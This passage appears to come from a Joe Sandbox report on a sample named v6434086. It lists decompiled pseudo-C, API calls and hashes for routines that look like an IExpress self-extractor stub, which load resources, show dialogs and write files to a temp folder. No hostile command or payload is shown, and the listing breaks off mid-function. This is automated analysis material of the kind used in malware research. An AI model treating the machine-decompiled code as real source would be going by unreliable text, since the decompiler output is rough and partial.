                                                                                                                                                                                                        0x00bc2a6f
                                                                                                                                                                                                        0x00bc2a6f
                                                                                                                                                                                                        0x00bc2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00BC2A6F
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharUpperA.USER32(9F7D84CA,00000000,00000000,00000000), ref: 00BC27A8
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharNextA.USER32(0000054D), ref: 00BC27B5
                                                                                                                                                                                                          • Part of subcall function 00BC2773: CharNextA.USER32(00000000), ref: 00BC27BC
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2829
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2852
                                                                                                                                                                                                          • Part of subcall function 00BC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2870
                                                                                                                                                                                                          • Part of subcall function 00BC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00BC3938,?,?,?,?,-00000005), ref: 00BC2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00BC2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BC3938,?,?,?,?,-00000005,?), ref: 00BC2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00BC2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 2307a9e3de05458ea9a8ba95a845a98b772f1ba21f6ceaf06970a65b5d6cfb36
                                                                                                                                                                                                        • Instruction ID: 46a61183a8cbd7326eda00a3767cf4d90524d6e3e09d445d712edeaaefa7e0dc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2307a9e3de05458ea9a8ba95a845a98b772f1ba21f6ceaf06970a65b5d6cfb36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64510631A00219EBCB21CF99C884EAEBBF5FF48705F1441AEE905E3211DB319941DBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00BC4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00BC468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00BC468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00BC44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                        0x00bc417d
                                                                                                                                                                                                        0x00bc418f
                                                                                                                                                                                                        0x00bc4193
                                                                                                                                                                                                        0x00bc41b7
                                                                                                                                                                                                        0x00bc41d3
                                                                                                                                                                                                        0x00bc41e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc41e7
                                                                                                                                                                                                        0x00bc41d5
                                                                                                                                                                                                        0x00bc41d6
                                                                                                                                                                                                        0x00bc41d8
                                                                                                                                                                                                        0x00bc41d9
                                                                                                                                                                                                        0x00bc41da
                                                                                                                                                                                                        0x00bc41df
                                                                                                                                                                                                        0x00bc41e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc41e1
                                                                                                                                                                                                        0x00bc41b9
                                                                                                                                                                                                        0x00bc41ba
                                                                                                                                                                                                        0x00bc41bc
                                                                                                                                                                                                        0x00bc41bd
                                                                                                                                                                                                        0x00bc41be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc41be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00BC30B4), ref: 00BC4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00BC30B4), ref: 00BC41E7
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 4e517c43ce6f7d48518a77f851748d0153d2c265d4cb1a76c000d2fa8b98d7d9
                                                                                                                                                                                                        • Instruction ID: 56704204fb8811727fc14508aa3dda31274a9a2b7107d3fb63e90c93275c5f94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e517c43ce6f7d48518a77f851748d0153d2c265d4cb1a76c000d2fa8b98d7d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801D1B53002183BF32416694CA6F7B69CEDBD57D9F1440ADB746F22809FA8CE014179
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00BC43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xbc9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00BC6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                        0x00bc19e0
                                                                                                                                                                                                        0x00bc19e0
                                                                                                                                                                                                        0x00bc19eb
                                                                                                                                                                                                        0x00bc19f2
                                                                                                                                                                                                        0x00bc19f9
                                                                                                                                                                                                        0x00bc19fc
                                                                                                                                                                                                        0x00bc1a01
                                                                                                                                                                                                        0x00bc1a2a
                                                                                                                                                                                                        0x00bc1a2e
                                                                                                                                                                                                        0x00bc1a3e
                                                                                                                                                                                                        0x00bc1a4f
                                                                                                                                                                                                        0x00bc1a62
                                                                                                                                                                                                        0x00bc1a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1a03
                                                                                                                                                                                                        0x00bc1a06
                                                                                                                                                                                                        0x00bc1a20
                                                                                                                                                                                                        0x00bc1a20
                                                                                                                                                                                                        0x00bc1a08
                                                                                                                                                                                                        0x00bc1a08
                                                                                                                                                                                                        0x00bc1a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1a16
                                                                                                                                                                                                        0x00bc1a18
                                                                                                                                                                                                        0x00bc1a70
                                                                                                                                                                                                        0x00bc1a72
                                                                                                                                                                                                        0x00bc1a72
                                                                                                                                                                                                        0x00bc1a14
                                                                                                                                                                                                        0x00bc1a06
                                                                                                                                                                                                        0x00bc1a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00BC1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00BC1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00BC1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 25a1f6ba9bed675ed84763abea71754e7af84893696714001e72c96a7a836589
                                                                                                                                                                                                        • Instruction ID: a8a14160c4eb81534a4eff8f28f02c7ed4c0d07f1402b5cd5d4fc75d8562372e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25a1f6ba9bed675ed84763abea71754e7af84893696714001e72c96a7a836589
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD118E31501109AFDB10EF68DD08FAE77F8EB4A305F1085A8F926A3191DE309E01CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xbc8004; // 0x9f7d84ca
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xbc8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xbc8004 = _t39;
				}
				_t37 =  !_t36;
				 *0xbc8008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                        0x00bc715d
                                                                                                                                                                                                        0x00bc7161
                                                                                                                                                                                                        0x00bc7165
                                                                                                                                                                                                        0x00bc7178
                                                                                                                                                                                                        0x00bc7182
                                                                                                                                                                                                        0x00bc718e
                                                                                                                                                                                                        0x00bc7197
                                                                                                                                                                                                        0x00bc71a0
                                                                                                                                                                                                        0x00bc71b1
                                                                                                                                                                                                        0x00bc71b8
                                                                                                                                                                                                        0x00bc71c4
                                                                                                                                                                                                        0x00bc71c7
                                                                                                                                                                                                        0x00bc71cb
                                                                                                                                                                                                        0x00bc71d5
                                                                                                                                                                                                        0x00bc71da
                                                                                                                                                                                                        0x00bc71da
                                                                                                                                                                                                        0x00bc71dc
                                                                                                                                                                                                        0x00bc71dc
                                                                                                                                                                                                        0x00bc71e2
                                                                                                                                                                                                        0x00bc71e5
                                                                                                                                                                                                        0x00bc71ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BC7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00BC7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BC719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00BC71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00BC71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 7b064a88fa38505ccdd7639be15bcd4dba0b7698967cd3236f47c3d14a069d19
                                                                                                                                                                                                        • Instruction ID: d3f327a85898284bb602467f8a3e59d17e0914798dfc783f009b46e4d5fb1a80
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b064a88fa38505ccdd7639be15bcd4dba0b7698967cd3236f47c3d14a069d19
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2011F571D05208ABCB10DFB8DA58E9EB7F4EB5D315F6948AAE905E7210EF309A048B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00BC63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00BC1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				E00BC658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xbc9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xbc9124 = 0x80070052;
					_t37 = 0;
				}
				return E00BC6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                        0x00bc63cb
                                                                                                                                                                                                        0x00bc63d2
                                                                                                                                                                                                        0x00bc63d8
                                                                                                                                                                                                        0x00bc63ea
                                                                                                                                                                                                        0x00bc63f3
                                                                                                                                                                                                        0x00bc6401
                                                                                                                                                                                                        0x00bc6402
                                                                                                                                                                                                        0x00bc6410
                                                                                                                                                                                                        0x00bc6415
                                                                                                                                                                                                        0x00bc6433
                                                                                                                                                                                                        0x00bc6438
                                                                                                                                                                                                        0x00bc6449
                                                                                                                                                                                                        0x00bc6463
                                                                                                                                                                                                        0x00bc646d
                                                                                                                                                                                                        0x00bc6477
                                                                                                                                                                                                        0x00bc6477
                                                                                                                                                                                                        0x00bc647a
                                                                                                                                                                                                        0x00bc643a
                                                                                                                                                                                                        0x00bc643a
                                                                                                                                                                                                        0x00bc6444
                                                                                                                                                                                                        0x00bc6444
                                                                                                                                                                                                        0x00bc6492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-3290032183
                                                                                                                                                                                                        • Opcode ID: 8dafed93fbe42e0a06b5b148eed96ec8361084f876345551713b88f1bd6a37a7
                                                                                                                                                                                                        • Instruction ID: f3a450e7e0f5a63403c463d9afbd6fbef0f69e16c54be91f6eed0db8e4a0381d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dafed93fbe42e0a06b5b148eed96ec8361084f876345551713b88f1bd6a37a7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A421A2B1A0021CABDB14DF25DC8AFEB77A8EB59314F1041A9F585A3280DEB05D858FA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00BC1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xbc91e0; // 0x31d8ea8
						 *(_t34 + 4) = _t11;
						 *0xbc91e0 = _t34;
						return 1;
					}
					_t25 =  *0xbc8584; // 0x0
					E00BC44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xbc8584; // 0x0
				E00BC44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                        0x00bc47e8
                                                                                                                                                                                                        0x00bc47f0
                                                                                                                                                                                                        0x00bc47f4
                                                                                                                                                                                                        0x00bc480f
                                                                                                                                                                                                        0x00bc4811
                                                                                                                                                                                                        0x00bc4814
                                                                                                                                                                                                        0x00bc4814
                                                                                                                                                                                                        0x00bc4816
                                                                                                                                                                                                        0x00bc4817
                                                                                                                                                                                                        0x00bc4829
                                                                                                                                                                                                        0x00bc482b
                                                                                                                                                                                                        0x00bc482f
                                                                                                                                                                                                        0x00bc484f
                                                                                                                                                                                                        0x00bc4852
                                                                                                                                                                                                        0x00bc4855
                                                                                                                                                                                                        0x00bc4855
                                                                                                                                                                                                        0x00bc4857
                                                                                                                                                                                                        0x00bc4858
                                                                                                                                                                                                        0x00bc4860
                                                                                                                                                                                                        0x00bc4865
                                                                                                                                                                                                        0x00bc486a
                                                                                                                                                                                                        0x00bc486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4876
                                                                                                                                                                                                        0x00bc4831
                                                                                                                                                                                                        0x00bc4841
                                                                                                                                                                                                        0x00bc4847
                                                                                                                                                                                                        0x00bc480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc480b
                                                                                                                                                                                                        0x00bc47f6
                                                                                                                                                                                                        0x00bc4806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00BC4E6F), ref: 00BC47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00BC4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00BC4847
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-3290032183
                                                                                                                                                                                                        • Opcode ID: 55303f5eb85f411912df1a218383323f9ce4063bb451091e4d40598c8a989079
                                                                                                                                                                                                        • Instruction ID: a189f0dd3142ef081598a0bdab61844557eb323e55551ff72b50b5967c72ba3a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55303f5eb85f411912df1a218383323f9ce4063bb451091e4d40598c8a989079
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E112575604641AFE7188F24AC68F733B9AEB8A300B18859DFA829B341DF758D068760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                        0x00bc368c
                                                                                                                                                                                                        0x00bc368f
                                                                                                                                                                                                        0x00bc3691
                                                                                                                                                                                                        0x00bc369f
                                                                                                                                                                                                        0x00bc36a7
                                                                                                                                                                                                        0x00000000
